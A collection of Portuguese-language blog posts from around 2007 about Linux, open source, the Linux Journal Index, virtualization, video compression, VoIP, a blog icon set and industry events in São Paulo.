O Meme dos Comandos Mais Usados

Resolvi aderir ao meme (alguém sabe onde começou?).

floripa:~$ history|awk '{print $2}'|awk 'BEGIN {FS="|"} {print $1}'|sort|uniq -c|sort -rn|head -20
    222 ls
    140 cd
    136 ls
     52 rsync
     43 dmesg
     35 mv
     35 gmplayer
     24 sudo
     23 ps
     23 df
     19 mkvinfo
     18 rpm
     15 mkdir
     14 cat
     11 mkvextract
     11 less
     11 ffmpeg
     10 mmg
      9 ping
      9 kill

Resolvi dobrar o tamanho da lista para dar a chance das pessoas conhecerem novos comandos, menos populares, como mkvextract, mmg, mkvinfo, ffmpeg.

Queria lembrar que essa lista é uma fotografia do meu uso atual, e tenho manipulado muito vídeo últimamente. Em outros carnavais, iriam aparecer coisas como java, ssh, etc.

Inauguração da Sessão Índice Linux Journal

A revista Linux Journal sempre teve uma pequena sessão que passa quase despercebida pela maioria das pessoas, mas que é a primeira que devoro quando um exemplar cai em minhas mãos: a LJ Index.

Preparada por ninguém menos que Doc Searls — autor de Mundo de Pontas (World of Ends), The Clue Train Manifesto, e outros textos monumentais sobre a cybercultura, cybereconomia e Open Source — traz uma numerologia rápida, geral e deliciosa sobre coisas como Linux e cybercultura.

Comecei a traduzi-lo desde março de 2007, e vai aparecer na sessão Índice Linux Journal do meu blog. Quem assina meu feed geral já está recebendo. Quem só quiser assinar esta sessão, fique a vontade também.

Divirtam-se.

Índice Linux Journal, Abril de 2007

  1. Milhões de residentes no Second Life em 1 de janeiro de 2007: 2,287
  2. Milhares de dólares gastos por dia no Second Life, em 1 de janeiro de 2007: 803,79
  3. Dias em 2007 quando Linden Labs abriu o código fonte do cliente do Second Life: 8
  4. Bilhões de dólares em vendas de eletrônicos em 2006: 145,7
  5. Porcentagem de lares pesquisados na Alemanha que leem blogs: 15
  6. Porcentagem de “influenciadores” pesquisados na Alemanha que leem blogs: 27
  7. Porcentagem de lares pesquisados nos EUA que leem blogs: 27
  8. Porcentagem de “influenciadores” pesquisados nos EUA que leem blogs: 34
  9. Porcentagem de lares pesquisados no Japão que leem blogs: 74
  10. Porcentagem de “influenciadores” pesquisados no Japão que leem blogs: 91
  11. Porcentagem de todos os blogs que são escritos em inglês: 39
  12. Porcentagem de todos os blogs que são escritos em japonês: 33
  13. Porcentagem de mulheres americanas vivendo sem um marido em 1950: 35
  14. Porcentagem de mulheres americanas vivendo sem um marido em 2000: 49
  15. Porcentagem de mulheres americanas vivendo sem um marido em 2005: 51
  16. Anos desde que o código fonte do Jabber foi lançado: 8
  17. Faixa em milhões de usuários das tecnologias de código fonte XMPP (Jabber): 40-50
  18. Número de PCs biprocessados rodando Linux em Tradebit AG: 10
  19. Terabytes de dados servidos por Tradebit AG: 20
  20. Milhões de números de downloads por dia de Tradebit: 1

Fontes

  • 1, 2: Tristan Louis
  • 3: Linden Lab
  • 4-10: Edelman
  • 11, 12: Technorati
  • 13-15: New York Times
  • 16, 17: XMPP.org
  • 18-20: Tradebit AG

Por Doc Searls. Original: http://www.linuxjournal.com/article/9594#mpart5

Índice Linux Journal, Março de 2007

  1. Número de jornalistas na prisão, no mundo todo, em 7 de dezembro de 2006: 134
  2. Aumento anual de jornalistas presos, no ano passado: 9
  3. Número de nações com jornalistas presos: 24
  4. Número de jornalistas presos, relacionados a Internet: 67
  5. Posição da China na lista de campeões em prisão de jornalistas: 1
  6. Número de jornalistas presos na China: 31
  7. Porcentagem do market share do Firefox na Slovênia: 39
  8. Porcentagem do market share do Firefox na Finlândia: 35.4
  9. Porcentagem do market share do Firefox na Eslovákia: 34.3
  10. Porcentagem do market share do Firefox na Polônia: 32.3
  11. Porcentagem do market share do Firefox na República Checa: 31.3
  12. Taxa de crescimento do market share do Firefox na França: 19.5
  13. Porcentagem do market share do Firefox na América do Norte: 13.5
  14. Porcentagem do market share do Firefox na Oceania: 21.4
  15. Tempo médio em minutos e segundos gastos num site, com telefones móveis: 2:53
  16. Tempo médio em minutos e segundos gastos num site, com outras conexões, incluindo PCs: 5:03
  17. Renda de servidores Linux em bilhões de dólares no último trimestre medido: 1.5
  18. Porcentagem de crescimento de renda de Linux, ano a ano: 5.4
  19. Porcentagem do share de Linux entre todas as rendas de servidores: 11.8
  20. Ranking de confiabilidade de Tiscali, rodando em Linux: 1

Fontes

  • 1-6: Comtê de Proteção a Jornalistas
  • 7-16: XiTi Monitor
  • 17-19: IDC
  • 20: Netcraft.com

Por Doc Searls. Original: http://www.linuxjournal.com/article/9474#mpart4

Simples de Implementar

Especificação do Microsoft Office Open XML, impressaEstas são as 6000 páginas impressas da especificação do Microsoft Office “Open” XML.

A que tem “aberto” no nome, mas ninguém pode participar de seu desenvolvimento. Aquela que não tem nenhuma outra implementação além da do Microsoft Office.

Aquela que foi objeto da assertiva da Microsoft ao dizer que ter vários padrões é bom.

É o “padrão” que concorre com o ODF, que por sua vez é bem mais simples e tem dezenas de implementações em softwares como o OpenOffice.org, BROffice.org, KOffice, Gnumeric, IBM Open Desktop, etc.

Conta a lenda que a Microsoft não tinha a menor intenção de abrir a especificação do OOX, mas como o ODF virou um padrão ISO, a Microsoft documentou a toque de caixa a sua proposta de formato para documentos de escritório, para enviar para pré-padronização pelo ECMA.

Pelo jeito foi um longo trabalho. Em todos os sentidos.

SOA, Web Services, Virtualização, Grid, Web 2.0: Mashup gigante

SOA é um estilo de arquitetura que tenta alinhar melhor processos de negócio com a TI.

Apesar de os frabricantes de TI — como a IBM — serem os que mais falam sobre isso, ingressar em SOA significa primeiro modularizar seus processos de negócio para depois mapear isso aos módulos de aplicações e infra-estrutura.

Grid é um conceito meio obsoleto. Como conceito, mas não como tecnologia. O conceito é obsoleto porque sua atuação é extremamente estrutural e muito complexa. Toda a terminologia relacionada a Grid tem caráter técnico, difícil de explicar e de nada adianta uma empresa pensar em Grid se seus processos de negócio e aplicações que os implementam não estiverem modularizados.

Por isso inventaram SOA. Para que provedores de TI pudessem ter um discurso mais ameno e acessível ao vender a idéia para gestores em seus clientes. E também para atacar o problema do excesso de complexidade da TI do cliente em sua raiz: na modelagem de seus processos de negócio.

E Web Services, onde entra? Dividindo em camadas, o conceito de SOA mora na fronteira entre negócios e TI. Na hora em que os processos vão se materializar em software e aplicações, a boa prática sugere usarmos certos padrões de desenvolvimento, de integração entre módulos. Esses padrões foram agrupados juntos nas especificações de Web Services, e se preocupam em definir como se faz chamadas a serviços (métodos) remotos, como um serviço encontra outro, etc. Então, nessas camadas conceituais, Web Services encontra-se logo abaixo de SOA.

E Grid está logo abaixo de Web Services. Ocupa-se dos mesmos problemas e soluções, mas com abordagens mais operacionais. Grid nasceu em um ambiente científico e WS em um ambiente de aplicações de negócios. Reinventaram a roda um do outro diversas vezes. Mas nos últimos anos têm juntado esforços para limpar os overlaps a fim de produzir um único conjunto de métodos e boas práticas.

Tudo isso é Virtualização

Se a virtualização de hardware (Xen, VMWare, z/VM) divide um equipamento em vários pedacinhos, SOA, WS e Grid dividem a aplicação em vários pedacinhos funcionais.

A virtualização de software (SOA, etc.) é mais difícil de fazer. Mas é também muito mais poderosa que a de hardware. Traz benefícios mais consistentes, mais abrangentes (porque tiveram que arrumar a casa dos negócios antes) e de mais longo prazo.

Tudo isso tem a ver com a Web 2.0

Explicar Web 2.0 está fora do escopo agora, mas sua arquitetura tem muito a ver com SOA.

Ao invés de feeds, podcasts e APIs JavaScript da Web 2.0, SOA tem serviços, provedores de dados e de funcionalidades. Equivalente ao HTML, capaz de juntar funcionalidades e dados de diversos sites, SOA tem a Linguagem de Execução de Processo de Negócio (BPEL, que é XML) que define a ordem e dependências ao juntar Web Services para formar uma aplicação maior. O papel das tags e folksonomy da Web 2.0, é exercido pelo UDDI no contexto de Web Services.

Mashups da Web 2.0 (experimente o iGoogle) são as Aplicações Compostas do SOA (veja também na Wikipedia).

E o Enterprise Service Bus do SOA (também na Wikipedia) tem o Browser como seu equivalente na Web 2.0. Sim, porque ambos tem a missão de materializar as conexões lógicas definidas pelo DHTML ou BPEL.

Web 2.0 é a Arquitetura Orientada a Serviços global.

A “Outra” Comunidade Open Source

O Tux corporativoEu acho vibrante ser membro da comunidade Open Source, contribuir com código, evangelizar e encontrar geeks em eventos para escovar bits verbais sobre módulos do kernel a ideais futuristas.

Mas tem uma outra Comunidade Open Source que estou me tocando que existe e que faço parte: a corporativa.

Sim, existe uma seita de engravatados que tem o Tux como mascote, carregam-no como broches em seus ternos, e conversam sobre um monte de assuntos interessantes, inclusive Linux e Open Source.

Ontem fui a um jantar que a Linux Magazine promoveu em São Paulo para os patrocinadores de seus eventos Linux Park. Estavam presentes todos os representantes da seita: Gouveia pela LPI, Annunciação, Tamaris, Carol pela Novell, David Barzilay pela Red Hat, Meyer, Edmundo e Batista pela Itautec, Sulamita a Linux Chix de cabelo vermelho da Intel, Edson pela Fujitsu, Rafael pela revista, e eu pela IBM. Faltaram (de fazer falta mesmo) Oracle, HP, e outros.

Enquanto os geeks trocam pessoalmente chaves GPG de criptografia (juro que vi esse ritual num evento do KDE, na Alemanha), nós, os engravatados, vibramos com o ritual do trading de cartões de visita. Brincos, piercing, cabelão são trocados por gel e bons perfumes. Um tom de voz idealista e revolucionário é substituido por um tratamento formal, moldado por anos de prática em atendimento a clientes. Num evento geek como o FISL é comum ver muitos, em público, focados em seus laptops, construindo código, enquanto nessa nova seita os coffee-breaks são importantes para construir relacionamentos. Network de dados versus o networking corporativo.

As duas facções dessa comunidade — a geek e a corporativa — são importantes e se completam. Uma gera tecnologia, a outra trata de dar um sentido prático e de valor comercial. Uma idealiza e pensa no amanhã, e a outra comunica e prepara o terreno hoje. Os geeks vão ao fundo da tecnologia, e a corporação trata de moldá-la para ser user friendly e de fácil compreensão. E da mesma forma que Fedoras e Slackwares esquecem suas diferenças a fim de trabalhar por um ideal comum, Red Hats e Novells, IBMs e Itautecs e HPs, etcs e etcs comungam juntos para o bem de um mercado livre e grande o suficiente para todos. As comunidades engravatada e a geek não podem existir uma sem a outra e vice-versa. E fico feliz em navegar bem entre as duas.

O jantar estava ótimo e se estendeu até tarde. Tive que sair umas 11 por completa exaustão física e mental, depois de um dia cheio, com muita evangelização num evento para parceiros, sobre Linux em System z (o famoso mainframe).

Suas Multas e Linux

Sabe aquela multa de radar que você recebeu? Foi enviada pelo Tux.

Mas não o culpe por isso. Linux só foi a base tecnológica para todo o sistema.
Ontem conversei bastante com o pessoal da Engebras, empresa que cria e administra a maioria dos radares de São Paulo e outros estados. Já tinha ouvido falar que todos os sistemas para suportar essa monitoração era baseada em Linux, e eles contaram mais detalhes. Continue lendo…


Os radares são na verdade câmeras analógicas com sensibilidade melhorada conectadas a computadores próximos que rodam Linux que por sua vez digitalizam a imagem instantaneamente com a ajuda de placas de captura de vídeo. As placas dos carros são imediatamente reconhecidas por OCR por uma biblioteca de uma empresa israelense, a multa é impressa, enviada pelo correio, recolhida no banco e repassada para o governo estadual, federal ou município, dependendo da jurisdição.

Todos os carros que passam por um radar — infrator ou não — são filmados. Não é uma câmera fotográfica, e sim uma filmadora.

Tazo (gerente de informática da Engebras) e seu pessoal afirmaram que todos os sevidores da empresa rodam Linux. Coisa de 50 a 60 servidores. Mas são servidores paravirtuais. Porque servidores físicos mesmo a empresa tem menos de 10.

Fiquei feliz em ver um exemplo vivo de um datacenter inteiramente virtual, e imaginei a flexibilidade operacional que eles tem em fazer movimentações de serviços sem indisponibilidades.

Mostraram sua extranet onde pode-se ver as fotos de infrações do momento, mais estatísticas de variação de velocidade média por hora, número de veículos, e até seu tamanho. Mostraram também como motoqueiros cometem infrações, mas escondem sua placa com a mão.


Além disso, imediatamente consultam uma base de dados de veículos não licenciados (em MySQL), mas aqui não se pode multar por radar. Por outro lado uma aviso é enviado para a polícia da região, avisando a placa e o ponto onde o veículo foi detectado.

40% da frota nacional não é licenciada, inclusive viaturas da polícia.

Há também os radares de farol, onde não basta uma imagem estática. É necessário registrar o movimento do veículo ultrapassando o sinal vermelho como evidência. Neste caso são usados softwares livres como ffmpeg para gerar este clip em MPEG.

A comunicação entre os radares e o datacenter central é geralmente provida por GPRS, pelas operadoras de celular da localidade.

Se tiver sorte, o pessoal da Engebras vai passar no meu blog para dar mais detalhes de sua operação.

Supra-sumo em Compressão de Video

Andei estudando tecnologias de compressão de vídeo e é um mundo fascinante. Tudo sobre Linux.

DivX e Xvid são compressores ainda bons mas de gerações anteriores. O mais moderno e avançado é o H.264 também conhecido por MPEG-4 AVC, padrão ISO. Uma das melhores implementações desse compressor é livre: o projeto x264.

E sobre containers, um dos mais completos hoje em dia é o MP4. Um mesmo arquivo MP4 pode conter uma trilha de vídeo, outra de vídeo em outros ângulos, outra de audio em inglês, outra de audio em português, e outras de legendas em várias linguas, em Unicode, menu como o de um DVD, informação sobre capítulos etc. Isso é um significativo avanço em relação ao container AVI da Microsoft que não suportava nada disso. Pode-se fazer um backup de um DVD para um arquivo MP4, incluindo toda a sua interatividade, menus e capítulos.

Apesar do nome sugestivo, MP4 não é a evolução do MP3. Afirmar isso é como dizer que .gif evoluiu para .tar, coisa que não faz sentido. A evolução do MP3 é AAC e HE-AAC. MP4 (um formato de container) pode conter streams MP3 (um formato de audio), como fiz abaixo, mas o mais natural e moderno é um MP4 conter streams AAC.

Converti um vídeo de 53 segundos que fiz com minha câmera. Veja a comparação:

  Original.avi Comprimido.mp4
Geral 53s, 15.077 kb/s, 640×480, 30 quadros por segundo 53s, 2.495 kb/s, 640×480, 30 quadros por segundo
Tamanho 100.326.316 Bytes 16.639.145 Bytes
Trilha de vídeo 99.697.780 Bytes, compressão Motion JPEG 15.952.188 Bytes, compressão H.264
Trilha de audio 586.888 Bytes, formato PCM mono 11,024 Hz 657.699 Bytes, compressão MP3 mono 22,05 Hz 64kbps
Overhead do container 41.648 Bytes ou 0.04% do tamanho do arquivo 29.258 Bytes ou 0.18% do tamanho do arquivo

Há duas discrepâncias aqui:

  1. O tamanho relativo do container deveria ter diminuido.
    O overhead do container MP4 é bem menor que AVI, mas como o tamanho do vídeo diminuiu muitíssimo, isso distorceu a relação do tamanho do container com o do arquivo. Se transferíssemos sem recomprimir os streams de audio e vídeo do AVI p/ MP4, veríamos uma significativa queda de overhead do container.
  2. O tamanho da trilha de audio aumentou.
    O fato é que tive sérios problemas para compactar o audio. Minha câmera grava som em formatos tão baixos que tive que aumentar a freqüência do sinal para o arquivo ser aceito pelo LAME. E ai usei bitrates talvez altos de mais para a compressão. Mas ganhei tanto com o H.264 que nem vou esquentar a cabeça.

O vídeo final é de alta qualidade (comparado com o original), e não consegui perceber diferença entre eles. Olhei várias vezes, com muita atenção.

Eu ainda fiz questão de alta qualidade, e mantive o bitrate em 2495 kbps. Poderia ter diminuido mais ainda o tamanho se fizesse compressão em 2 passos. Filmes em formato Xvid (MPEG-4 ASP) que se baixa da Internet, em boa qualidade, tem aproximadamente 850 kbps. É esperado que se dermos só 850 kbits para o H.264 trabalhar 1 segundo de vídeo, obteremos resultados melhores comparados ao Xvid.

The Blog Icons

This is a collection of high quality vectorial icons to represent common ideas and actions of the blogosphere.

They were based on the SVG work from FeedIcons.com. The base button is the same, but mathematically simplified on the XML level. New buttons were added based on other popular icons found on the web or created by myself. Also some redesign was made for new shapes to make the icons look better when exported to smaller image sizes.

By the way, I am not a designer nor an artist. I just know how to use SVG-creation tools as Inkscape or make good XML. Or I just have a blog demanding for these icons. So I’m sure people can contribute better color mixings an outlines. Let me know and lets integrate your ideas into this project in the right way.

Please share alike this icons. They have a Creative Commons license. I appreciate if you can link to my blog when using them.

Icons for Feed and OPML

Feed IconThese icons where the base for this work, specially the feed icon as found in its website. They were probably created with proprietary tools such as Adobe Illustrator and then exported to open formats such as SVG or PNG. The original OPML icon can be found at opmlicons.com

OPML IconThe versions here are visually identical to the original ones, but mathematically simplified. They are now being maintained in an open format — SVG — here, and are a better option because of its open source code and formats, and distribution.

Icons for Trackback and Share

Trackback and Pingback IconThese icons can be found sometimes in the blogosphere. I don’t know who designed them but they are a good representation of the Trackback and Pingback ideas.

The Share icon is not my preferred but for now it is just a copy of what can be found around.

Share IconColors and shapes are identical and based on the feed icon button. I never saw these icons in a size bigger than 16×16 pixels. Now, in a scalable format, they can be rendered at any size you want.

Permalink IconThese are original creations and come in several options. I am still not sure which one is the best. You can also suggest other shapes.

As you can see, I am using this icon to identify that each section on this post has a permalink.

Other Icons

Comment Icon Edit Icon Cancel Icon Tag Icon Download Icon Clock Icon

Other original icons: Comments, Edit, Cancel, Tag, Download, Upload and Clock (to represent date and time). I’m open to suggestions for better shapes.

Challenges for Icon Sizes

The original design of these icons (from feedicons.com) looks wonderful on sizes bigger than 22 pixels, but most people will use them on small sizes as 16×16. So this package delivers also shape design that look better on small sizes as 22×22, 16×16, etc. I am using these sizes all around my blog as you can see.

Converting the SVG Files into Images

In the Blog Icons ZIP file you will find the XML:SVG source code for all icons. Additionally you will get all icons in PNG (preferred), GIF and JPG formats, in common sizes from 10×10 to 128×128 pixels. If you want a specific size, you can import the source SVG file in some graphical tool as Inkscape (on Linux), or CorelDraw, Adobe Illustrator, etc and export them into any format and size you want.

Or use the Makefile like this (on Linux you will need Inkscape and ImageMagick installed):

Make all default sizes of all icons, in PNG, GIF and JPG:

bash$ make all

Make Feed icon in GIF format, at 40×40 pixel size:

bash$ make SIZE=40 feed.gif

Make all icons, all formats at 40×40 pixel sizes:

bash$ make SIZE=40

Evento sobre Soluções Práticas para Linux

Vamos realizar aqui na IBM um evento gratuito para empresas e profissionais que prestam serviços de TI. O objetivo é mostrar possibilidades de arquiteturas que poucos conhecem mas que trazem enormes benefícios operacionais e financeiros, pois usa computação de forma ecônomica.
Abordarei os seguintes assuntos:

  • Posicionando Open Source e Linux no TI das empresas
  • Clusters de Alta Disponibilidade e Replicação
  • Paravirtualização: a última tendência em virtualização de Hardware
  • Esquemas especiais de segurança com SELinux e AppArmor
  • Grid e SOA com Linux
  • Possibilidades de Linux no desktop
  • PC Multiusuário
  • Formato OpenDocument
  • Outros

Será dia 8 de maio, próxima terça, das 14:00 às 17:30 na IBM São Paulo (rua Tutóia 1157). Sala TU02-226.

Confirme presença com a Fernanda Moraes <femoraes@br.ibm.com> por e-mail ou no telefone 11-2132-5691.

Adicione:

Venha conhecer mais profissionais de sua área, trocar idéias e tomar um café.

O Efeito Online

Estou usando barba a uns 2 anos.

Mas nesse tempo todo não troquei minhas fotos online, tipo a do MSN Messenger, Orkut, etc. No cyberespaço estou sem barba.

Ai, reencontro pessoas que não me vêem a uns 6 meses (as últimas vezes que me viram ao vivo já estava com barba), mas me dizem que estou diferente, que deixei a barba crescer !!

Isso tem acontecido com muita freqüência.

Conclusão: inconscientemente, as pessoas esperam me enxergar ao vivo com a mesma fisionomia que me vêem online.

Maravilhas da Telefonia Moderna

Vou usar este post para descarregar as coisas maravilhosas que tenho descoberto sobre telefonia móvel, VoIP, e suas aplicações para o mundo corporativo.

Este assunto é fascinante e importante porque telefonia móvel está intimamente ligada a conectividade móvel. A pessoas estarem 100% do tempo conectadas, trocando informações e conhecimento. Desde Graham Bell muita coisa mudou e o conceito todo foi diversas vezes reinventado.

  • VoIP é um assunto de muitos donos. Cada fabricante de PBX (central telefônica, Cisco, Avaya, Nortel, etc) inventa seus protocolos proprietários. O padrão universal se estabeleceu com o SIP, que é um protocolo muito parecido com HTTP.
  • A partir do momento em que duas pontas (computadores, smartphones) tem IPs e um software capaz de “falar” SIP, elas podem fazer uma conexão direta e começar a conversa de voz, video, ou texto.
  • Um softphone é um software que implementou o padrão SIP. Isso é muito fácil, em parte porque o SIP é um padrão aberto. Em Windows eu uso o PhonerLite e em Linux uso o Ekiga e o KPhone.
  • A parte proprietária do SIP são alguns codecs de voz: eles são necessários para comprimir (e descomprimir) a voz entre os interlocutores, e funcionam mais ou menos como compressão em MP3, só que otimizados para voz. Os proprietários são o G.711, G.726 e os codecs abertos são os excelentes Speex e o iLBC. Se não há um codec comum entre as duas pontas, algum intermediário terá que fazer a conversão, e esse é um dos papeis do PBX (ou central telefônica).
  • Pode-se montar uma central telefônica em casa com um PC velho e com pouca RAM, usando o Asterisk, que nada mais é do que um software que implementa a lógica de uma central. Mais fácil ainda, pode-se usar o life CD do AstLinux (que contém o Asterisk) e bootar qualquer PC como um PBX IP.
  • Pode-se montar uma central telefônica online gratuitamente, usando serviços como o PBXes. Cadastra-se os usuários e seus softphones e pode-se configurar serviços como um número para conferência, número que faz tocar vários telefones simultaneamente, caixa postal, voice mail para e-mail, etc.
  • Para usar SIP para ligar para números de telefonia convencional (land lines) no mundo todo, é necessário comprar serviços de minutagem de algum provedor. O mais barato que conheço é o SIP Discount com preços realmente agressivos, e alguns países totalmente gratuitos. Esse processo todo é similar a usar o Skype, só que o software é genérico, e a minutagem é muitíssimo mais barata. Diga-se de passagem, entre todos esses serviços de minutagem VoIP, o Skype é o mais proprietário e de longe o mais caro. Outros serviços são o Ekiga.net, Gizmo, VoIP Discount (da mesma empresa do SIP Discount, mas com softphone proprietário).
  • O único inconveniente em usar SIP é substituir o telefone pelo computador. Na prática é desconfortável, e não temos um computador conectado sempre conosco. Mas isso já está sendo resolvido. Leia adiante.

Nokia: O Celular das Pessoas Conectadas

A Nokia não me pagou para dizer isso, mas com certeza meu próximo celular será um smartphone desse fabricante, da linha N ou E.

  • Esses celulares mais avançados tem um cliente SIP embutido e integrado. Ao se escolher um número da agenda para ligar, ele pergunta se a ligação é normal ou pela Internet. Até aí não há nenhuma diferença em pegar um smartphone qualquer, por exemplo baseado em Windows Mobile 5.0, e instalar um softphone nele. Mas esse SO não vai te deixar ficar on line o tempo todo: sua bateria vai acabar antes da hora do almoço.
  • Esses celulares tem WiFi, mas não é esse o fator mais importante. WiFi em um handheld seca sua bateria em menos de duas horas conectadas. O que realmente importa é que o Symbian OS (sistema operacional desses aparelhos) foi otimizado para se manter sempre conectado por WiFi, mas economizando energia quando não há dados trafegando. Mais ainda: quando se muda de localidade, ele detecta a mudança, se reconecta e se reconfigura.
  • Quando não há redes WiFi (mais baratas ou gratuitas), pode-se usar outras redes de dados, tipo GPRS (do GSM) ou WCDMA (do CDMA). O Symbian OS trata de fazer a troca de redes de forma transparente, sem interrupções. Essa gerência automática de redes somada a otimização de uso de energia para WiFi faz esse SO ser realmente especial.
  • O SIP integrado ao celular elimina o inconveniente de precisar de um computador. O celular é o computador conectado a Internet o tempo todo, da forma mais barata possível para uma localidade que se está.
  • Uma equipe de funcionários de uma mesma empresa, portando celulares com VoIP como os da Nokia (que na verdade são os únicos do mercado hoje), usando serviços gratuitos como os do PBXes, poderão se telefonar com push-to-talk (como Nextel), fazer conferências, ter o ramal transferido para o celular, enviar SMSs, fazer video conferências por IP (no novo N73), etc, de graça. Isso quando estiverem associados a uma rede WiFi, como as de seu escritório, ou em casa. Quando estiverem na rua, ainda poderão fazer tudo isso com VoIP sobre GPRS a custos bem mais baixos do que os dos minutos de voz GSM ou CDMA, porque o custo-benefício de voz comprimida sobre IP é melhor que o de voz tradicional.
  • Para ligações internacionais ou quando estiverem viajando, esses usuários poderão receber ligações VoIP gratuitamente em seus celulares, ou fazer a custo muito baixo com serviços como SIP Discount. Além de literalmente levarem seu ramal consigo.
  • Além do mais esses celulares contam com um arsenal de ferramentas para a web, tais como um ótimo browser, melhor que a média dos handhelds do mercado, player de multimídia incluindo filmes e leitores de feeds. A soma desses elementos faz o celular ser um ótimo cliente para podcasts. Se o som do seu carro tiver bluetooth, seu Nokia pode transmitir seus podcasts favoritos para ele enquanto estiver dirigindo para o trabalho.

Se as informações aqui estão um pouco desestruturadas é porque isso foi um “dump mental” mesmo. Para compartilhar rapidamente esse conhecimento com você, leitor.

Festa no Novo Escritório da Red Hat Brasil

A Red Hat comemorou hoje seu novo escritório num dos edifícios mais novos e elegantes de São Paulo.

Endereço do novo escritório da Red Hat

Muitos parceiros e clientes foram confortavelmente recebidos para um coquetel espaçoso num escritório colorido, decorado com uma mistura de cartazes de propaganda de produtos, e outros com a famosa frase de Gandhi que foi adotada pelo Open Source:

Primeiro eles te ignoram, depois eles riem de você, depois eles lutam contra você, e depois você vence.

A primeira coisa que chamava a atenção era a “Sala de Descompressão”, onde o pessoal pode relachar jogando games. Mas depois nos levaram para conhecer as espaçosas salas de reunião, as bem equipadas salas de aula, e as salas dos gerentes.

Havia realmente muito espaço que eles pretendem preencher com novas contratações de vendedores, sales engineers, pessoal de marketing etc. E havia ainda a outra metade inteira do andar para mobiliar e ocupar. Mas em pequenos passos.

A Red Hat (ou Rêd Hétchi, como diz Alejandro Chocolat, argentino gente boa que comanda a empresa no Brasil) inaugurou sua operação por aqui ao comprar a Latin Source, empresa que já os representava no cone sul.

Estavam todos presentes: Chocolat com seu inconfundível sotaque, Julian, Gabriel Szulik (com o mesmo sobrenome do diretor mundial da empresa, mas que afirma não ser parente dele), Rodrigo Missiagia e suas belas camisas caneladas, Filipe absorvido em resolver o problema de um cliente, David Barzilay com um terno novo e bonito, Leticia, Edgar (o sopro Java/JBoss na equipe técnica de vendas), Paulo Banitz e outros tantos que lamento não lembrar o nome.

O ar da empresa tem um quê de Google: aquele ambiente descontraido onde todos trabalham por prazer, fazem o que gostam, e ainda estão na ponta da tecnologia. Eles pretendem dobrar de tamanho em um ano.

Há um lado oculto da empresa: o laboratório de tecnologia. É oculto porque seus membros não ficam muito a vista, imersos em melhorar o kernel do Linux, o JBoss, e escovar outros bits. É o lar de figurões como Marcelo Tosatti, Acme e outros.

A conversa com o Edgar, figura Java, foi particularmente interessante. Ele veio da Summa e está a uma semana na Red Hat. É o primeiro da empresa que tem a missão de falar sobre JBoss com o mercado. Contou que muitos clientes já usam JBoss gratuitamente, e que agora é hora de provar o valor de terem também suporte comercial. Contei que achava muito importante a Red Hat ter comprado a JBoss. Na linha do tempo de decidir qual tecnologias adotar, uma empresa pensa antes na plataforma de aplicações (coisas como o JBoss, WebSphere, middleware em geral), e só depois no sistema operacional (Linux). No tecnês do dia a dia, dizemos que sistema operacional é um mal necessário. Ter uma oferta tão estratégica e expressiva como o JBoss coloca a Red Hat numa posição adiantada nessa linha do tempo.

Resumo da ópera: a festa foi superdivertida e ótima para encontrar os amigos do nosso mundo de Linux comercial no Brasil.

Notas Sobre Evento de Virtualização da Novell no Rio

Ontem aconteceu o evento de Virtualização da Novell na primeira cidade brasileira: Rio de Janeiro.

Houve palestras ótimas da HP, AMD, Novell, e outros parceiros da Novell.

Roberto Brandão da AMD mostrou os detalhes arquitetônicos de seus novos processadores AMD-64 (Opteron). Gráficos esclarecedores sobre como os bits trafegam entre chipset, CPU, RAM, etc. Muito convincente. Contou também que o quadcore da AMD é o primeiro produto líder de mercado da companhia, com mais de 50% de share. Seus quadcore são realmente quatro CPU completas embutidas num chip só, incluindo gerência de memória autônoma, etc. Segundo ele, isso é mais difícil de fazer (mas traz melhores resultados de processamento e consumo de energia) do que a abordagem de dual-dual-core (dois dual core no mesmo chip), do concorrente, que não citou o nome.

Se eu tiver sorte, ele vai passar aqui no meu blog para contar mais. Roberto foi também o que mais se aprofundou nos detalhes da nova paravirtualização, e quase me deixou sem palavras. Eu tinha a pretensão de ser o único a dissecar este assunto…

Roberto contou que as novas versões do AMD-V vão ter novidades para I/O, e que estão melhorando o processador para que a virtualização tradicional (sem paravirtualização) seja mais eficiente. Obviamente essas características poderão ser aproveitadas por hypervisors de paravirtualização também.

Alexandre Gourdard da HP mostrou os blades e as abordagens que a HP tem para virtualização, tanto em Linux, Windows e HP-UX. Foi bastante focada em hardware e em serviços de gerência.

Richard Doll da Novell fez algumas apresentações. A mais interessante foi sobre o acordo com a Microsoft, e seus pontos de colaboração: (para) virtualização, gerência de identidade e federação de diretórios, formatos de documentos, administração de sistemas (integrando o Windows Updates com soluções da Novell), etc. Claro que a Microsoft quer engolir o mercado de Linux e vice-versa. Ninguém vai para o céu aqui (nem a comunidade Open Source). Mas acho que essa parceria tem pontos positivos.

Eu entrei envorgonhado porque os apresentadores antes de mim já tinham falado praticamente tudo que se podia falar sobre virtualização. Bem, virtualização de hardware somente. Mostrei a linha do tempo desse tipo de virtualização, como a IBM criou esse conceito em 1967, e até 1998 (ano de surgimento da VMWare) era a única que fazia isso. Até 2003, o ano que mudou tudo com a criação do Xen, e a reinvensão da Paravirtualização.

Mostrei os dados do Gartner que mostravam as “10 hipest technologies” para os próximos 18 a 36 meses, que tem virtualização no topo, seguido por Grid e SOA (que nada mais são do que formas diferentes de virtualização). Linux para aplicações importantes aparece em sétimo lugar.

Falei sobre virtualização de storage com o SAN Volume Controler, mostrando os benefícios em relação ao SAN tradicional.

Claro, falei sobre Xen explicando as diferenças em relação a virtualização tradicional. É incrível como todo mundo fala sobre Xen, mas não explica como e porque a parvirtualização é melhor. Acredito que se os defensores do Xen não deixarem isso claro na cabeça das pessoas, elas não vão comprar a idéia. É importante ressaltar isso.

Nas minhas tradicionais viagens filosóficas, depois de mostrar o Xen e seus benchmarks, levantei o seguinte: se a paravirtualização traz uma série de benefícios operacionais, a praticamente nenhum custo de performance, por que agora não podemos virtualizar a totalidade de nosso datacenter? Não só as pequenas instalações, mas também os grandes DBs, etc que geralmente são instalados em máquinas dedicadas. Serão máquinas paravirtuais rodando sobre um hardware dedicado. Isso é factível principalmente agora que o VMWare e virtualização da Microsoft implementarão paravirtualização também.

Fiz questão de ressaltar ao longo da apresentação que virtualização vai muito além do hardware. De fato, as virtualizações mais vantajosas, que trazem os melhores benefícios, são os que fazemos no nível do software. Isso levou a entrar no tema da virtualização invertida: Grid e SOA, onde a aplicação é maior que um computador (na virtualização de hardware, o computador é maior que a aplicação). O ponto aqui é repensar a forma como as aplicações são arquitetadas, modularizá-las, componentizar, e usar middleware para simplificar e “virtualizar” a infraestrutura. Parece que só eu falei sobre estes pontos.

